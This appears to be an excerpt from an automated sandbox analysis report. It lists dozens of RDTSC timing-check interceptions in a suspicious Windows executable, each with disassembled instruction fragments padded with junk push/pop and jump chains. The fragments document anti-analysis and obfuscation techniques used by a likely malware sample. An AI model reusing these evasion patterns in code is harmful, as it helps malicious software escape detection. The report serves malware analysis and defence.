                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F131 second address: 79F13B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F66C0B351F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F13B second address: 79F141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F141 second address: 79F14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F66C0B351F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F14B second address: 79F14F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A31A0 second address: 7A31A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A31A4 second address: 7A31BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F66C0B35952h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8DA8 second address: 7A8DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7720 second address: 7A7725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7877 second address: 7A787D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A787D second address: 7A7883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7883 second address: 7A789A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F66C0B351FDh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A789A second address: 7A789E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A789E second address: 7A78A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A78A4 second address: 7A78BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F66C0B35948h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A78BA second address: 7A78BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A78BE second address: 7A78CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F66C0B35946h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7CD5 second address: 7A7D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35204h 0x00000009 popad 0x0000000a pushad 0x0000000b jl 00007F66C0B351F6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 jmp 00007F66C0B35209h 0x0000001d pushad 0x0000001e jbe 00007F66C0B351F6h 0x00000024 jmp 00007F66C0B351FFh 0x00000029 popad 0x0000002a popad 0x0000002b jl 00007F66C0B35206h 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 pop esi 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7D39 second address: 7A7D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7FFD second address: 7A8001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8001 second address: 7A8023 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66C0B35946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F66C0B35958h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8023 second address: 7A8048 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F66C0B35201h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jng 00007F66C0B351F6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8048 second address: 7A8064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66C0B35958h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA56D second address: 7AA572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B13C1 second address: 7B13C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B13C7 second address: 7B13CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAE66 second address: 7BAE73 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F66C0B35946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA4FA second address: 7CA50F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F66C0B351FCh 0x0000000c jo 00007F66C0B351F6h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA50F second address: 7CA517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA33C second address: 7CA355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F66C0B351FFh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA355 second address: 7CA35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CC0B7 second address: 7CC0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35203h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F66C0B351FFh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CC265 second address: 7CC26B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BABD1 second address: 6BABD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3B6E second address: 7E3B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35950h 0x00000007 jng 00007F66C0B3594Eh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f je 00007F66C0B35946h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b js 00007F66C0B35946h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3B9C second address: 7E3BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3BA7 second address: 7E3BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3E84 second address: 7E3E92 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F66C0B35202h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4152 second address: 7E417A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F66C0B3594Fh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F66C0B3594Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E417A second address: 7E417E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E417E second address: 7E4184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5EE8 second address: 7E5EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5EF0 second address: 7E5F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66C0B35955h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8750 second address: 7E875F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E875F second address: 7E8764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8979 second address: 7E899C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F66C0B35208h 0x00000008 jmp 00007F66C0B35202h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC0D4 second address: 7EC0D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7064C9 second address: 7064CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7037A second address: 4E7038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66C0B3594Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7038A second address: 4E703CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F66C0B351FBh 0x00000015 or eax, 1BA2611Eh 0x0000001b jmp 00007F66C0B35209h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E703CC second address: 4E703E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66C0B35958h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E704C0 second address: 4E704D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906B9 second address: 4E906BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906BD second address: 4E906C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906C3 second address: 4E906C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906C9 second address: 4E906CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906CD second address: 4E906DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906DC second address: 4E906E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906E0 second address: 4E906E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E906E6 second address: 4E9070D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F66C0B35202h 0x00000009 sbb al, FFFFFF98h 0x0000000c jmp 00007F66C0B351FBh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9070D second address: 4E9074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F66C0B35950h 0x0000000f jmp 00007F66C0B35955h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F66C0B3594Dh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9074E second address: 4E90754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90754 second address: 4E90758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90758 second address: 4E90779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90779 second address: 4E9077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9077D second address: 4E90798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90798 second address: 4E907A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0C2BC08Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9086C second address: 4E9088F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 call 00007F66C0B351FBh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F66C0B351FBh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9088F second address: 4E908CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F66C0B3594Fh 0x00000009 adc cl, 0000001Eh 0x0000000c jmp 00007F66C0B35959h 0x00000011 popfd 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], eax 0x0000001a pushad 0x0000001b push ecx 0x0000001c mov eax, edi 0x0000001e pop edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90922 second address: 4E90999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F66C0B351FFh 0x00000009 adc ah, FFFFFF9Eh 0x0000000c jmp 00007F66C0B35209h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov esi, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F66C0B35209h 0x00000021 pushfd 0x00000022 jmp 00007F66C0B35200h 0x00000027 and esi, 65D899F8h 0x0000002d jmp 00007F66C0B351FBh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E900AE second address: 4E9011F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 4DBF2361h 0x0000000e jmp 00007F66C0B35957h 0x00000013 xor dword ptr [esp], 3B2A0811h 0x0000001a jmp 00007F66C0B35956h 0x0000001f mov eax, dword ptr fs:[00000000h] 0x00000025 pushad 0x00000026 push ecx 0x00000027 push edi 0x00000028 pop ecx 0x00000029 pop ebx 0x0000002a popad 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F66C0B3594Ah 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9011F second address: 4E90125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90125 second address: 4E9013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, al 0x00000005 mov di, 386Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9013A second address: 4E9013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9013E second address: 4E9015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35958h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9015A second address: 4E90162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90162 second address: 4E901E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub esp, 18h 0x0000000a jmp 00007F66C0B35956h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 movzx eax, bx 0x00000014 pushfd 0x00000015 jmp 00007F66C0B35953h 0x0000001a add ax, F8DEh 0x0000001f jmp 00007F66C0B35959h 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007F66C0B35951h 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov esi, edi 0x00000032 jmp 00007F66C0B3594Fh 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E901E3 second address: 4E90220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F66C0B35205h 0x0000000b xor ecx, 46EF0B26h 0x00000011 jmp 00007F66C0B35201h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90220 second address: 4E90224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90224 second address: 4E90237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B351FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90237 second address: 4E902AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F66C0B35957h 0x00000010 jmp 00007F66C0B35958h 0x00000015 pop ecx 0x00000016 movsx edx, cx 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b jmp 00007F66C0B3594Ah 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F66C0B35957h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902AF second address: 4E902E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F66C0B35203h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902E4 second address: 4E902E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902E8 second address: 4E902EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E902EE second address: 4E9034D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35954h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F66C0B3594Eh 0x00000011 xor si, 9638h 0x00000016 jmp 00007F66C0B3594Bh 0x0000001b popfd 0x0000001c popad 0x0000001d mov eax, dword ptr [769B4538h] 0x00000022 pushad 0x00000023 mov edx, ecx 0x00000025 mov si, 0E03h 0x00000029 popad 0x0000002a xor dword ptr [ebp-08h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F66C0B35950h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9034D second address: 4E90353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90353 second address: 4E90359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90359 second address: 4E90390 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F66C0B35203h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E90390 second address: 4E903AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66C0B35959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903AD second address: 4E903B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903B3 second address: 4E903B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E903B7 second address: 4E903DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F66C0B35204h 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
